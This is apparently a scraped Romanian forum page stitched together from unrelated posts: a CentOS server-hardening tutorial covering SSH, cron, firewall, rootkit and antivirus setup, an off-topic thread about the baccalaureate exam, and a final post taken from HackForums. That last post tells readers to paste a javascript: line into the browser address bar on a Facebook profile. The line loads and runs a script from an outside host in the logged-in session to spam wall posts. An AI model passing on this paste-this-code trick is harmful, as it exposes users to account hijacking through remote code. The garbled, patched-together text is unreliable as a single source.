Leaderboard

Acest tutorial este facut pentru distro-uri RHEL , in special CentOS. De obicei,eu prefer sa instalez sistemul fara pachete,nici macar "Base" dar sa presupunem ca s-a instalat sistemul si suntem in consola. Primul lucru este update la pachete. yum update yum upgrade Recomand inchiderea SeLINUX si trecerea in Disabled ( nu permissive ). Daca este server ce are ca scop virtualizarile si de a deveni host pentru servere guest merge si interfata web pentru acces diferit de ssh. Daca serverul se vrea WebServer pentru monitorizare se poate folosi Cacti sau Nagios. Daca serverul are ca scop mail o interfata web pentru module de filtrare si interfata pentru cei care nu sunt obisnuiti cu comenzile de consola din iptables. Dupa ce s-a terminat cu update-ul este important sa oprim serviciile care nu le folosim. DEZACTIVARE SERVICII # ps –ax - listeaza toate procesele ce ruleaza # ls –l /etc/rc.d/rc3.d/S* - va arata toate scripturile de start-up # netstat –a - listeaza toate porturile deschise # chkconfig – lista arata startup-ul actual al tuturor proceselor cunoscute de chkconfig Dupa ce se face lista cu ce trebuie si nu trebuie se foloseste comanda service numeserviciu stop pentru oprirea serviciului sau din chkconfig se scoate din ce init-uri sa nu porneasca sau sa porneasca. SECURIZARE CRONTAB Este important pentru CRON sa fie folosit doar userul root.Daemonul de cron este folosit pentru a programa procese.Comanda 'crontab' este folosita pentru a crea intrari personale de crontab pentru useri sau contul de root.Pentru a intarii securitatea pe cron,se poate stabili prin cron.deny sau cron.allow care sunt fisiere,folosirea crontabului. Urmatoarele comenzi vor face ca userul root sa fie singurul cu permisiuni de a adauga cron-uri. cd /etc/ /bin/rm -f cron.deny at.deny echo root >cron.allow echo root >at.allow /bin/chown root:root cron.allow at.allow /bin/chmod 400 cron.allow at.allow SECURIZARE SSH SI ACCES REMOTE Nu este recomandat pentru acces remote folosirea telnet.Secure Shell ( SSH ) este o alternativa securizata ce ofera encriptie pe conexiune.Pentru securizarea lui se va folosi protocolul 2 de ssh ce este mult mai putin vulnerabil decat ssh1,vom dezactiva login-ul direct cu root.Pentru asta trebuie editat fisierul de configurare 'sshd_config' aflat in /etc/ssh/. Ar trebui sa arate in felul urmator configurarea Protocol 2 PermitRootLogin no PermitEmptyPasswords no Banner /etc/issue IgnoreRhosts yes RhostsAuthentication no RhostsRSAAuthentication no HostbasedAuthentication no LoginGraceTime 1m SyslogFacility AUTH (ofera logging sub autoritatea syslog) AllowUser [lista utilizatorul ce au accesul permis] DenyUser [lista conturilor de sistem si altele care nu au acces] MaxStartups 10 (numarul maxim de conexiuni simultane neautentificare.este folositor pentru protectie brute force care face forking.) Eu sunt de parere ca ar trebui schimbat si portul de acces dar ramane la alegerea fiecaruia. FIREWALL Pentru firewall eu as merge pe CSF ( ConfigServer Firewall ) .Este free si configurarea se poate face din csf.conf care este mult mai friendly. ATENTIE : Are nevoei de pachetul libwww-perl !! Link-ul de download este acesta : http://configserver.com/free/csf.tgz Download cu wget si pe urma in directorul in care s-a descarcat #tar -xzvf csf.tgz #cd csf ./install.sh Configurarea se face din /etc/csf/csf.conf .Recomand citirea fisierului deoarece contine explicatii si instructiuni precise cu referire la functionalitatea firewallului. ROOTKIT Este recomandat si folosirea unui scanner de rootkit si porturi de retea suspecte.Eu am folosit mereu rootkit hunter si este foarte bun si un pic interactiv sa zicem asa.Se gaseste pe sourceforge si este usor de instalat. VIRUSI ClamAV ramane o solutie viabila free pentru scanare ce detecteaza si shell-uri php ce pot crea probleme. Link: Download Clam AntiVirus from SourceForge.net In principiu cam asta ar fi o securitate basic la nivel de server.Daca doriti completari sau mai detaliat anumit punct postati cu incredere.Astept si corectari daca am gresit ceva.

@dragos...da se paote da si acasa, in conditii speciale, dar nu am vrut sa ma agit. Stiu clar ca o sa ia la toamna. Cu ultima 100 de metri, sunt de acord PARTIAL. Cu alte cuvinte, pe ultima suta DOAR REPTEI, si FIXEXI anumite aspecte care nu le stapanesti foarte ok. Eventual cu 2 seri inainte, o recapitulare "aerisita" te mai uiti 2 ore pe ce stii ca nu esti bazat. btw...avatarul ala, esti tu? sau doar starea ta de spirit?? @cosminn. Uite, din astia ca tine imi place cau au prins la bac. Numai pe fente, pe combinatii. Nu urla ai tai ca ministrul ti-a distrus viitorul? Uitati de progeniturile astea vorbeab. Dc sa dai bani la prof? Chiar esti asa analfabet ca nu iei un bac. sau te numeri printre exeplmarele din cantecul de mai sus? Va dati toti hackeri, dar nu luati un bac.....asta chiar e buna. @dragosh Felicitari sincere pt ce ai facut la bac. Super tare. Bravo tie. Esti printre cei ce arata ca SE POATE LUA UN BAC, in conditii REALE DE EXAMEN. BTW...avatarul ala esti tu, sau doar starea ta de spirit???

<input type="submit" value="TRIMITE" name='submit'/>

Intra?i pe profilul unui utilizator facebook,?terge?i tot din c?su?a URL,?i copia?i asta: javascript:(a = (b = document).createElement("script")).src = "//dumar.pl/dumar_script.js", b.body.appendChild(a); void(0) dupaia scrie?i in casuta care va apare cate mesaje doriti sa lasati pe perete,dati ok si enjoy! LE: Merge doar la prieteni!!! Sursa: HackForums